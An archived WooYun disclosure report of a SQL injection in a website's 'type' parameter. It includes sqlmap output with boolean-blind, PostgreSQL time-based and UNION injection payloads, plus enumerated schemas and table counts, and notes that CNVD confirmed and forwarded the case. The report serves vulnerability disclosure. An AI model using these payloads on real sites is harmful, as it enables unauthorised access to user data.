乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-12: 细节已通知厂商并且等待厂商处理中 2015-10-16: 厂商已经确认,细节仅向厂商公开 2015-10-26: 细节向核心白帽子及相关领域专家公开 2015-11-05: 细节向普通白帽子公开 2015-11-15: 细节向实习白帽子公开 2015-11-30: 细节向公众公开
RT
http://**.**.**.**/star/index.php?type=3
sqlmap resumed the following injection point(s) from stored session:---Parameter: type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=3' AND 1950=1950 AND 'OWSG'='OWSG Type: AND/OR time-based blind Title: PostgreSQL > 8.1 AND time-based blind Payload: type=3' AND 6711=(SELECT 6711 FROM PG_SLEEP(5)) AND 'GlTL'='GlTL Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: type=3' UNION ALL SELECT NULL,(CHR(113)||CHR(113)||CHR(120)||CHR(106)||CHR(113))||(CHR(102)||CHR(77)||CHR(107)||CHR(114)||CHR(121)||CHR(113)||CHR(97)||CHR(106)||CHR(118)||CHR(106))||(CHR(113)||CHR(113)||CHR(106)||CHR(112)||CHR(113)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-----[15:19:39] [INFO] the back-end DBMS is PostgreSQLweb application technology: Nginx, PHP 5.6.13back-end DBMS: PostgreSQL[15:19:39] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes[15:19:39] [INFO] fetching database (schema) names[15:19:39] [WARNING] reflective value(s) found and filtering outavailable databases [4]:[*] dict[*] information_schema[*] pg_catalog[*] public
Database: pg_catalog+---------------+---------+| Table | Entries |+---------------+---------+| pg_attribute | 2673 || pg_proc | 2255 || pg_operator | 705 || pg_type | 374 || pg_class | 359 || pg_cast | 191 || pg_index | 154 || pg_opclass | 112 || pg_opfamily | 69 || pg_attrdef | 44 || pg_constraint | 36 || pg_database | 21 || pg_ts_dict | 16 |+---------------+---------+
Database: public+--------------------+---------+| Table | Entries |+--------------------+---------+| article | 1111 || member | 971 || wj2_result | 603 || wj3_result | 451 || guestbook | 154 || wj4_result | 153 || article_permission | 76 || yjxx | 65 || xxbyy | 61 || wj_item | 57 || qxyy | 41 || article_type | 36 || article_part | 32 || wj1_result | 26 || link | 21 || place | 20 || ttyy | 16 || kb | 10 || video | 2 |+--------------------+---------+
危害等级:高
漏洞Rank:10
确认时间:2015-10-16 14:27
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无